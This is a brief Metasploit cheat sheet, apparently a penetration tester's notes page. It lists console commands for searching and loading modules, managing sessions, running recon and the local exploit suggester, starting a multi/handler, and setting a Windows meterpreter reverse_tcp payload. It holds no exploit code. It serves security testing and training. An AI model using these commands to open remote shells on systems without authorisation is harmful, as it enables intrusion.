🤖MetaExploit

Basic Sheet

Search:

search <name>
#Use
use <name>

#See options
options

#Set options
set

Sessions

#list active sessions
sessions
#On meterpreter
background

#New payload
use exploit <exploitname>
set session <sessionID>

Modules

#Recon
use post/multi/recon
#Muli handler
use exploit/multi/handler
# local exploits
use post/multi/recon/local_exploit_suggester

Payloads

#Windows
set payload windows/meterpreter/reverse_tcp

Last updated